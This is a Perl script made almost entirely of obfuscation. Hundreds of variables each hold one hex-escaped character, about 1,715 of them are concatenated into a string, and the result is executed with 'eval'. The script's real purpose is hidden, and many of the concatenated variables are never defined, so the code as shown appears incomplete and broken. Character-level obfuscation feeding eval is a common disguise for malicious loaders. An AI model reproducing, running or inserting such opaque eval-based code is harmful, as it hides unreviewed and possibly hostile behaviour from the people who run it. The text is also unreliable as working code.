$ri1644="\x24";$ri1307="\x6e";$ri1458="\x23";$ri1661="\x69";$ri441="\x2c";$ri1033="\x61";$ri754="\x22";$ri685="\x5c";$ri1293="\x0a";$ri586="\x61";$ri1594="\x72";$ri689="\x30";$ri1306="\x69";$ri174="\x6d";$ri1252="\x69";$ri338="\x6f";$ri1289="\x0a";$ri571="\x0a";$ri468="\x66";$ri1079="\x09";
$ri335="\x28";$ri1679="\x3b";$ri580="\x6d";$ri1688="\x3b";$ri1061="\x20";$ri1507="\x6d";
$ri906="\x76";
$ri1208="\x65";
$ri1031="\x24";$ri1253="\x5d";
$ri526="\x79";$ri93="\x6e";$ri996="\x76";$ri63="\x65";$ri215="\x29";$ri1168="\x2d";$ri1140="\x20";$ri1331="\x29";$ri1587="\x20";
$ri574="\x76";$ri1707="\x61";$ri1298="\x72";$ri748="\x64";$ri1358="\x72";$ri1231="\x5b";$ri402="\x78";$ri777="\x64";$ri879="\x74";$ri430="\x63";$ri1277="\x5b";$ri649="\x24";
$ri1368="\x20";$ri411="\x09";$ri1174="\x7b";$ri1389="\x09";$ri1350="\x20";$ri671="\x6e";$ri1462="\x69";$ri499="\x63";$ri1361="\x6d";
$ri1503="\x23";$ri442="\x20";$ri203="\x40";$ri942="\x20";$ri503="\x65";$ri1533="\x20";$ri682="\x3d";$ri1288="\x7d";$ri1004="\x2e";$ri552="\x69";$ri1283="\x69";$ri1467="\x20";
$ri223="\x6e";$ri953="\x74";$ri1470="\x63";$ri1677="\x20";$ri1628="\x6d";$ri1626="\x74";
$ri578="\x6e";$ri1345="\x69";$ri1431="\x29";$ri886="\x29";$ri291="\x68";$ri1094="\x0a";$ri431="\x72";$ri798="\x0a";$ri469="\x6c";$ri551="\x40";$ri445="\x65";$ri856="\x72";$ri1651="\x74";$ri854="\x66";$ri1124="\x7b";$ri417="\x23";$ri1451="\x6e";
$ri1453="\x3b";$ri1300="\x6e";$ri612="\x20";$ri826="\x09";$ri516="\x72";$ri918="\x69";$ri692="\x5c";
$ri1640="\x61";$ri1287="\x09";$ri1213="\x66";$ri1043="\x3b";$ri316="\x24";$ri811="\x20";$ri1607="\x6e";$ri665="\x3d";$ri1142="\x20";$ri1237="\x6a";$ri705="\x6d";
$ri389="\x0a";$ri987="\x2e";$ri263="\x61";$ri1292="\x0a";
$ri1442="\x75";$ri1701="\x6f";$ri34="\x67";
$ri1178="\x6d";$ri1052="\x20";$ri1520="\x61";$ri1596="\x68";$ri425="\x69";$ri380="\x2c";$ri62="\x6d";$ri912="\x6d";$ri825="\x0a";$ri626="\x3d";$ri842="\x61";
$ri1019="\x64";
$ri916="\x22";
$ri818="\x20";
$ri1392="\x73";$ri1523="\x6f";$ri609="\x65";$ri820="\x74";
$ri1575="\x69";$ri41="\x29";
$ri910="\x6e";
$ri575="\x61";$ri274="\x65";$ri1191="\x61";$ri1428="\x2b";$ri920="\x22";$ri1268="\x6a";$ri154="\x09";$ri1699="\x74";$ri218="\x0a";$ri631="\x24";$ri211="\x20";$ri870="\x3c";$ri279="\x72";$ri907="\x61";$ri1218="\x3d";
$ri3="\x6f";$ri226="\x74";$ri97="\x41";$ri1492="\x75";$ri1258="\x40";$ri192="\x72";$ri1693="\x67";$ri23="\x6d";
$ri564="\x24";$ri673="\x66";
$ri1028="\x63";$ri230="\x28";$ri479="\x6d";$ri483="\x20";$ri893="\x6d";$ri1055="\x20";$ri1226="\x09";$ri1073="\x3b";$ri1365="\x69";$ri379="\x65";$ri542="\x73";$ri1639="\x6e";$ri1013="\x0a";
$ri1251="\x24";
$ri106="\x73";$ri1088="\x6d";$ri737="\x5d";$ri362="\x72";$ri1586="\x3d";$ri1154="\x79";$ri891="\x09";$ri786="\x29";$ri1041="\x3b";$ri393="\x75";$ri1352="\x22";$ri1525="\x73";$ri617="\x09";$ri816="\x28";$ri814="\x61";$ri183="\x3b";
$ri1176="\x09";$ri1559="\x67";$ri927="\x63";$ri1145="\x3b";
$ri1711="\x6e";$ri1469="\x65";$ri147="\x6f";$ri959="\x28";$ri1211="\x20";$ri1187="\x6e";$ri1107="\x65";$ri164="\x3d";$ri890="\x09";$ri684="\x22";$ri1400="\x3d";$ri1421="\x61";$ri15="\x72";$ri1562="\x77";$ri852="\x0a";$ri=$ri0.
$ri1.$ri2.$ri3.$ri4.$ri5.$ri6.$ri7.$ri8.$ri9.$ri10.
$ri11.$ri12.$ri13.$ri14.$ri15.$ri16.
$ri17.$ri18.$ri19.$ri20.
$ri21.$ri22.
$ri23.$ri24.
$ri25.$ri26.
$ri27.
$ri28.$ri29.$ri30.$ri31.$ri32.
$ri33.$ri34.
$ri35.$ri36.$ri37.$ri38.$ri39.
$ri40.
$ri41.
$ri42.$ri43.$ri44.$ri45.
$ri46.$ri47.$ri48.$ri49.$ri50.$ri51.$ri52.$ri53.$ri54.
$ri55.$ri56.
$ri57.$ri58.$ri59.$ri60.
$ri61.$ri62.$ri63.$ri64.$ri65.$ri66.$ri67.$ri68.$ri69.$ri70.$ri71.$ri72.$ri73.$ri74.$ri75.
$ri76.$ri77.$ri78.$ri79.$ri80.
$ri81.$ri82.$ri83.$ri84.$ri85.$ri86.$ri87.
$ri88.$ri89.$ri90.
$ri91.$ri92.$ri93.$ri94.$ri95.$ri96.$ri97.$ri98.$ri99.$ri100.$ri101.$ri102.
$ri103.
$ri104.$ri105.
$ri106.$ri107.$ri108.$ri109.$ri110.$ri111.$ri112.$ri113.$ri114.$ri115.
$ri116.$ri117.$ri118.$ri119.$ri120.$ri121.$ri122.$ri123.$ri124.$ri125.$ri126.$ri127.$ri128.
$ri129.$ri130.$ri131.$ri132.
$ri133.$ri134.$ri135.$ri136.$ri137.$ri138.$ri139.$ri140.$ri141.$ri142.$ri143.$ri144.
$ri145.$ri146.$ri147.
$ri148.$ri149.$ri150.
$ri151.$ri152.$ri153.$ri154.$ri155.
$ri156.$ri157.$ri158.$ri159.$ri160.
$ri161.$ri162.$ri163.$ri164.
$ri165.
$ri166.$ri167.$ri168.$ri169.$ri170.
$ri171.$ri172.
$ri173.$ri174.
$ri175.$ri176.$ri177.$ri178.$ri179.$ri180.
$ri181.$ri182.
$ri183.$ri184.$ri185.$ri186.$ri187.$ri188.$ri189.$ri190.$ri191.$ri192.$ri193.$ri194.$ri195.$ri196.$ri197.$ri198.
$ri199.$ri200.
$ri201.$ri202.$ri203.$ri204.$ri205.$ri206.$ri207.$ri208.$ri209.$ri210.$ri211.$ri212.$ri213.$ri214.$ri215.$ri216.$ri217.$ri218.$ri219.$ri220.$ri221.$ri222.$ri223.$ri224.$ri225.$ri226.$ri227.$ri228.$ri229.$ri230.
$ri231.
$ri232.
$ri233.$ri234.$ri235.$ri236.$ri237.$ri238.
$ri239.$ri240.
$ri241.$ri242.$ri243.$ri244.$ri245.$ri246.$ri247.$ri248.
$ri249.$ri250.$ri251.$ri252.
$ri253.$ri254.$ri255.$ri256.$ri257.$ri258.$ri259.
$ri260.$ri261.$ri262.
$ri263.$ri264.
$ri265.$ri266.$ri267.$ri268.$ri269.$ri270.
$ri271.$ri272.$ri273.$ri274.$ri275.
$ri276.$ri277.$ri278.$ri279.$ri280.
$ri281.$ri282.
$ri283.$ri284.$ri285.
$ri286.$ri287.$ri288.
$ri289.$ri290.
$ri291.
$ri292.$ri293.$ri294.
$ri295.$ri296.
$ri297.$ri298.$ri299.$ri300.$ri301.$ri302.$ri303.$ri304.
$ri305.
$ri306.$ri307.$ri308.$ri309.$ri310.$ri311.$ri312.
$ri313.$ri314.$ri315.$ri316.$ri317.$ri318.$ri319.$ri320.
$ri321.$ri322.
$ri323.$ri324.
$ri325.$ri326.
$ri327.$ri328.$ri329.$ri330.
$ri331.$ri332.$ri333.$ri334.$ri335.$ri336.$ri337.$ri338.$ri339.
$ri340.$ri341.$ri342.$ri343.$ri344.$ri345.$ri346.
$ri347.$ri348.$ri349.$ri350.
$ri351.$ri352.$ri353.$ri354.$ri355.$ri356.$ri357.$ri358.$ri359.$ri360.$ri361.$ri362.$ri363.$ri364.$ri365.$ri366.$ri367.$ri368.$ri369.$ri370.
$ri371.$ri372.
$ri373.$ri374.$ri375.
$ri376.$ri377.
$ri378.
$ri379.$ri380.
$ri381.$ri382.$ri383.$ri384.$ri385.$ri386.$ri387.$ri388.$ri389.$ri390.
$ri391.$ri392.$ri393.$ri394.$ri395.$ri396.$ri397.$ri398.
$ri399.$ri400.$ri401.$ri402.$ri403.$ri404.$ri405.$ri406.$ri407.$ri408.$ri409.$ri410.$ri411.$ri412.$ri413.$ri414.$ri415.$ri416.$ri417.$ri418.
$ri419.$ri420.$ri421.
$ri422.$ri423.$ri424.$ri425.
$ri426.$ri427.$ri428.$ri429.$ri430.$ri431.$ri432.
$ri433.$ri434.$ri435.$ri436.$ri437.$ri438.$ri439.$ri440.$ri441.$ri442.$ri443.$ri444.$ri445.$ri446.$ri447.
$ri448.$ri449.$ri450.$ri451.$ri452.$ri453.$ri454.$ri455.
$ri456.$ri457.$ri458.$ri459.$ri460.
$ri461.$ri462.
$ri463.$ri464.
$ri465.
$ri466.$ri467.$ri468.
$ri469.$ri470.$ri471.$ri472.
$ri473.$ri474.$ri475.
$ri476.$ri477.$ri478.$ri479.$ri480.
$ri481.
$ri482.$ri483.$ri484.$ri485.$ri486.
$ri487.$ri488.
$ri489.$ri490.$ri491.$ri492.$ri493.$ri494.$ri495.
$ri496.$ri497.$ri498.$ri499.$ri500.$ri501.
$ri502.$ri503.$ri504.$ri505.$ri506.$ri507.$ri508.$ri509.$ri510.$ri511.$ri512.$ri513.$ri514.$ri515.$ri516.$ri517.$ri518.$ri519.$ri520.
$ri521.$ri522.$ri523.$ri524.
$ri525.$ri526.$ri527.$ri528.$ri529.$ri530.$ri531.
$ri532.$ri533.$ri534.
$ri535.
$ri536.$ri537.$ri538.$ri539.$ri540.
$ri541.$ri542.$ri543.$ri544.$ri545.$ri546.$ri547.$ri548.$ri549.$ri550.$ri551.$ri552.$ri553.$ri554.$ri555.$ri556.$ri557.$ri558.$ri559.$ri560.$ri561.$ri562.$ri563.$ri564.
$ri565.$ri566.$ri567.$ri568.$ri569.$ri570.
$ri571.$ri572.$ri573.$ri574.$ri575.
$ri576.
$ri577.$ri578.$ri579.$ri580.$ri581.$ri582.$ri583.$ri584.$ri585.$ri586.$ri587.$ri588.$ri589.$ri590.
$ri591.$ri592.
$ri593.$ri594.
$ri595.
$ri596.$ri597.
$ri598.$ri599.$ri600.$ri601.$ri602.$ri603.$ri604.$ri605.$ri606.$ri607.$ri608.$ri609.$ri610.$ri611.$ri612.$ri613.
$ri614.$ri615.$ri616.$ri617.$ri618.$ri619.
$ri620.$ri621.$ri622.$ri623.$ri624.
$ri625.$ri626.$ri627.$ri628.$ri629.$ri630.
$ri631.$ri632.$ri633.$ri634.$ri635.$ri636.$ri637.
$ri638.
$ri639.$ri640.$ri641.$ri642.$ri643.$ri644.
$ri645.$ri646.$ri647.$ri648.
$ri649.
$ri650.$ri651.
$ri652.$ri653.$ri654.$ri655.$ri656.
$ri657.$ri658.
$ri659.$ri660.$ri661.$ri662.$ri663.$ri664.$ri665.$ri666.$ri667.$ri668.
$ri669.$ri670.$ri671.$ri672.
$ri673.$ri674.$ri675.$ri676.$ri677.$ri678.$ri679.$ri680.
$ri681.$ri682.$ri683.$ri684.
$ri685.$ri686.$ri687.$ri688.$ri689.$ri690.$ri691.$ri692.
$ri693.
$ri694.$ri695.$ri696.$ri697.$ri698.$ri699.$ri700.
$ri701.$ri702.
$ri703.$ri704.$ri705.$ri706.
$ri707.$ri708.$ri709.$ri710.
$ri711.
$ri712.$ri713.$ri714.$ri715.$ri716.$ri717.$ri718.$ri719.$ri720.
$ri721.$ri722.$ri723.$ri724.$ri725.$ri726.
$ri727.$ri728.$ri729.$ri730.$ri731.$ri732.
$ri733.$ri734.$ri735.$ri736.$ri737.$ri738.$ri739.$ri740.$ri741.$ri742.$ri743.$ri744.
$ri745.$ri746.$ri747.$ri748.
$ri749.$ri750.
$ri751.$ri752.$ri753.
$ri754.$ri755.$ri756.
$ri757.$ri758.$ri759.$ri760.$ri761.$ri762.$ri763.$ri764.
$ri765.
$ri766.$ri767.$ri768.$ri769.$ri770.$ri771.$ri772.$ri773.$ri774.$ri775.$ri776.$ri777.$ri778.$ri779.$ri780.
$ri781.$ri782.$ri783.
$ri784.$ri785.$ri786.$ri787.$ri788.$ri789.$ri790.$ri791.
$ri792.
$ri793.$ri794.$ri795.$ri796.$ri797.$ri798.$ri799.$ri800.
$ri801.$ri802.$ri803.
$ri804.
$ri805.$ri806.
$ri807.$ri808.$ri809.$ri810.$ri811.$ri812.$ri813.$ri814.$ri815.$ri816.
$ri817.$ri818.$ri819.$ri820.
$ri821.$ri822.$ri823.$ri824.$ri825.$ri826.$ri827.
$ri828.$ri829.$ri830.$ri831.$ri832.$ri833.$ri834.
$ri835.$ri836.$ri837.
$ri838.$ri839.$ri840.
$ri841.$ri842.$ri843.$ri844.
$ri845.$ri846.$ri847.$ri848.
$ri849.$ri850.$ri851.$ri852.$ri853.$ri854.$ri855.$ri856.$ri857.$ri858.$ri859.$ri860.$ri861.$ri862.$ri863.$ri864.$ri865.$ri866.$ri867.$ri868.$ri869.$ri870.$ri871.$ri872.$ri873.$ri874.$ri875.$ri876.
$ri877.$ri878.$ri879.$ri880.
$ri881.$ri882.$ri883.$ri884.$ri885.$ri886.$ri887.$ri888.$ri889.$ri890.
$ri891.$ri892.$ri893.$ri894.$ri895.$ri896.$ri897.$ri898.$ri899.
$ri900.$ri901.$ri902.$ri903.
$ri904.$ri905.$ri906.$ri907.$ri908.$ri909.$ri910.$ri911.$ri912.
$ri913.$ri914.$ri915.$ri916.$ri917.$ri918.$ri919.$ri920.
$ri921.$ri922.$ri923.
$ri924.
$ri925.$ri926.$ri927.$ri928.$ri929.$ri930.$ri931.$ri932.$ri933.$ri934.$ri935.$ri936.$ri937.$ri938.$ri939.$ri940.
$ri941.$ri942.$ri943.$ri944.$ri945.$ri946.$ri947.$ri948.$ri949.$ri950.
$ri951.$ri952.
$ri953.$ri954.$ri955.$ri956.$ri957.$ri958.$ri959.$ri960.
$ri961.$ri962.$ri963.$ri964.
$ri965.$ri966.$ri967.$ri968.$ri969.$ri970.$ri971.$ri972.
$ri973.$ri974.$ri975.
$ri976.$ri977.$ri978.$ri979.$ri980.$ri981.$ri982.$ri983.$ri984.
$ri985.$ri986.$ri987.$ri988.
$ri989.$ri990.$ri991.$ri992.$ri993.$ri994.$ri995.$ri996.$ri997.$ri998.$ri999.$ri1000.$ri1001.$ri1002.$ri1003.$ri1004.$ri1005.
$ri1006.$ri1007.$ri1008.
$ri1009.$ri1010.$ri1011.$ri1012.$ri1013.$ri1014.
$ri1015.$ri1016.$ri1017.$ri1018.$ri1019.$ri1020.
$ri1021.$ri1022.
$ri1023.$ri1024.
$ri1025.
$ri1026.$ri1027.
$ri1028.$ri1029.$ri1030.$ri1031.$ri1032.$ri1033.$ri1034.$ri1035.$ri1036.
$ri1037.$ri1038.$ri1039.$ri1040.
$ri1041.$ri1042.$ri1043.$ri1044.
$ri1045.
$ri1046.$ri1047.$ri1048.$ri1049.$ri1050.$ri1051.$ri1052.$ri1053.
$ri1054.$ri1055.
$ri1056.$ri1057.$ri1058.$ri1059.$ri1060.$ri1061.$ri1062.$ri1063.$ri1064.$ri1065.$ri1066.$ri1067.$ri1068.
$ri1069.$ri1070.$ri1071.$ri1072.
$ri1073.$ri1074.$ri1075.$ri1076.$ri1077.$ri1078.$ri1079.$ri1080.
$ri1081.$ri1082.$ri1083.$ri1084.$ri1085.$ri1086.$ri1087.$ri1088.
$ri1089.$ri1090.$ri1091.$ri1092.
$ri1093.$ri1094.$ri1095.
$ri1096.$ri1097.$ri1098.$ri1099.$ri1100.$ri1101.$ri1102.$ri1103.$ri1104.$ri1105.$ri1106.$ri1107.$ri1108.$ri1109.$ri1110.$ri1111.$ri1112.$ri1113.$ri1114.$ri1115.$ri1116.$ri1117.$ri1118.$ri1119.$ri1120.$ri1121.$ri1122.
$ri1123.$ri1124.$ri1125.$ri1126.$ri1127.$ri1128.
$ri1129.$ri1130.$ri1131.$ri1132.
$ri1133.
$ri1134.$ri1135.$ri1136.$ri1137.$ri1138.$ri1139.$ri1140.
$ri1141.$ri1142.$ri1143.$ri1144.$ri1145.$ri1146.$ri1147.$ri1148.$ri1149.$ri1150.$ri1151.$ri1152.
$ri1153.$ri1154.$ri1155.
$ri1156.$ri1157.$ri1158.$ri1159.$ri1160.
$ri1161.$ri1162.$ri1163.$ri1164.$ri1165.$ri1166.$ri1167.$ri1168.
$ri1169.$ri1170.$ri1171.$ri1172.$ri1173.$ri1174.$ri1175.$ri1176.$ri1177.
$ri1178.$ri1179.$ri1180.$ri1181.$ri1182.$ri1183.$ri1184.$ri1185.
$ri1186.$ri1187.$ri1188.
$ri1189.$ri1190.
$ri1191.$ri1192.$ri1193.$ri1194.
$ri1195.$ri1196.$ri1197.$ri1198.
$ri1199.$ri1200.
$ri1201.$ri1202.$ri1203.$ri1204.$ri1205.$ri1206.
$ri1207.$ri1208.$ri1209.$ri1210.$ri1211.$ri1212.
$ri1213.$ri1214.$ri1215.$ri1216.$ri1217.$ri1218.
$ri1219.$ri1220.
$ri1221.$ri1222.$ri1223.$ri1224.$ri1225.$ri1226.$ri1227.$ri1228.$ri1229.$ri1230.$ri1231.$ri1232.
$ri1233.$ri1234.
$ri1235.$ri1236.
$ri1237.$ri1238.$ri1239.$ri1240.$ri1241.$ri1242.$ri1243.$ri1244.$ri1245.$ri1246.$ri1247.$ri1248.
$ri1249.$ri1250.$ri1251.
$ri1252.$ri1253.$ri1254.$ri1255.
$ri1256.$ri1257.
$ri1258.$ri1259.$ri1260.
$ri1261.$ri1262.$ri1263.$ri1264.$ri1265.$ri1266.$ri1267.$ri1268.$ri1269.$ri1270.$ri1271.$ri1272.
$ri1273.$ri1274.$ri1275.
$ri1276.$ri1277.$ri1278.
$ri1279.$ri1280.$ri1281.$ri1282.$ri1283.$ri1284.
$ri1285.
$ri1286.$ri1287.$ri1288.$ri1289.$ri1290.
$ri1291.$ri1292.
$ri1293.$ri1294.$ri1295.$ri1296.
$ri1297.$ri1298.$ri1299.$ri1300.$ri1301.$ri1302.$ri1303.$ri1304.
$ri1305.
$ri1306.$ri1307.$ri1308.$ri1309.$ri1310.$ri1311.$ri1312.$ri1313.$ri1314.$ri1315.$ri1316.
$ri1317.$ri1318.$ri1319.$ri1320.$ri1321.$ri1322.
$ri1323.$ri1324.$ri1325.$ri1326.
$ri1327.$ri1328.$ri1329.$ri1330.$ri1331.$ri1332.$ri1333.$ri1334.
$ri1335.$ri1336.$ri1337.$ri1338.$ri1339.$ri1340.$ri1341.$ri1342.$ri1343.$ri1344.$ri1345.
$ri1346.$ri1347.$ri1348.
$ri1349.
$ri1350.$ri1351.$ri1352.$ri1353.$ri1354.$ri1355.$ri1356.$ri1357.$ri1358.$ri1359.$ri1360.
$ri1361.
$ri1362.$ri1363.$ri1364.$ri1365.
$ri1366.$ri1367.$ri1368.$ri1369.$ri1370.$ri1371.
$ri1372.
$ri1373.$ri1374.
$ri1375.$ri1376.$ri1377.$ri1378.$ri1379.$ri1380.
$ri1381.$ri1382.$ri1383.$ri1384.$ri1385.$ri1386.$ri1387.$ri1388.$ri1389.$ri1390.$ri1391.$ri1392.$ri1393.$ri1394.
$ri1395.$ri1396.$ri1397.$ri1398.$ri1399.$ri1400.
$ri1401.$ri1402.$ri1403.$ri1404.$ri1405.$ri1406.$ri1407.$ri1408.
$ri1409.$ri1410.$ri1411.$ri1412.$ri1413.$ri1414.$ri1415.$ri1416.$ri1417.$ri1418.$ri1419.$ri1420.$ri1421.$ri1422.
$ri1423.$ri1424.$ri1425.
$ri1426.$ri1427.$ri1428.$ri1429.$ri1430.$ri1431.$ri1432.$ri1433.$ri1434.$ri1435.$ri1436.$ri1437.$ri1438.$ri1439.
$ri1440.
$ri1441.$ri1442.$ri1443.$ri1444.
$ri1445.$ri1446.$ri1447.$ri1448.$ri1449.$ri1450.$ri1451.$ri1452.$ri1453.$ri1454.$ri1455.
$ri1456.$ri1457.$ri1458.$ri1459.$ri1460.
$ri1461.$ri1462.$ri1463.
$ri1464.$ri1465.$ri1466.$ri1467.$ri1468.$ri1469.$ri1470.$ri1471.$ri1472.
$ri1473.$ri1474.$ri1475.$ri1476.
$ri1477.
$ri1478.$ri1479.$ri1480.$ri1481.$ri1482.$ri1483.$ri1484.$ri1485.
$ri1486.$ri1487.$ri1488.$ri1489.$ri1490.$ri1491.$ri1492.$ri1493.$ri1494.
$ri1495.
$ri1496.$ri1497.$ri1498.$ri1499.$ri1500.$ri1501.$ri1502.$ri1503.
$ri1504.$ri1505.$ri1506.$ri1507.$ri1508.$ri1509.$ri1510.$ri1511.$ri1512.$ri1513.$ri1514.$ri1515.$ri1516.$ri1517.$ri1518.
$ri1519.$ri1520.$ri1521.$ri1522.$ri1523.$ri1524.$ri1525.
$ri1526.$ri1527.$ri1528.$ri1529.$ri1530.
$ri1531.$ri1532.$ri1533.$ri1534.
$ri1535.$ri1536.$ri1537.$ri1538.$ri1539.
$ri1540.$ri1541.$ri1542.$ri1543.$ri1544.
$ri1545.$ri1546.$ri1547.$ri1548.
$ri1549.$ri1550.$ri1551.$ri1552.$ri1553.$ri1554.
$ri1555.
$ri1556.$ri1557.$ri1558.$ri1559.$ri1560.$ri1561.$ri1562.$ri1563.$ri1564.$ri1565.$ri1566.
$ri1567.$ri1568.$ri1569.$ri1570.$ri1571.$ri1572.$ri1573.$ri1574.$ri1575.$ri1576.$ri1577.$ri1578.
$ri1579.$ri1580.
$ri1581.$ri1582.$ri1583.$ri1584.
$ri1585.$ri1586.$ri1587.$ri1588.$ri1589.$ri1590.$ri1591.$ri1592.$ri1593.
$ri1594.$ri1595.$ri1596.
$ri1597.$ri1598.$ri1599.$ri1600.
$ri1601.$ri1602.$ri1603.$ri1604.$ri1605.
$ri1606.
$ri1607.$ri1608.$ri1609.$ri1610.$ri1611.$ri1612.$ri1613.$ri1614.$ri1615.
$ri1616.
$ri1617.$ri1618.$ri1619.$ri1620.$ri1621.$ri1622.$ri1623.$ri1624.$ri1625.$ri1626.
$ri1627.$ri1628.$ri1629.$ri1630.
$ri1631.$ri1632.
$ri1633.$ri1634.$ri1635.$ri1636.$ri1637.$ri1638.$ri1639.$ri1640.
$ri1641.$ri1642.$ri1643.$ri1644.$ri1645.$ri1646.$ri1647.$ri1648.$ri1649.$ri1650.$ri1651.$ri1652.
$ri1653.$ri1654.$ri1655.
$ri1656.$ri1657.$ri1658.$ri1659.$ri1660.$ri1661.$ri1662.$ri1663.$ri1664.$ri1665.
$ri1666.$ri1667.$ri1668.$ri1669.$ri1670.$ri1671.$ri1672.
$ri1673.$ri1674.$ri1675.$ri1676.$ri1677.$ri1678.$ri1679.$ri1680.
$ri1681.$ri1682.$ri1683.$ri1684.$ri1685.$ri1686.
$ri1687.$ri1688.$ri1689.$ri1690.$ri1691.$ri1692.
$ri1693.$ri1694.$ri1695.$ri1696.$ri1697.$ri1698.$ri1699.$ri1700.$ri1701.$ri1702.
$ri1703.$ri1704.$ri1705.$ri1706.$ri1707.$ri1708.$ri1709.$ri1710.
$ri1711.
$ri1712.$ri1713.$ri1714.$ri1715;$c='ri';eval $ri;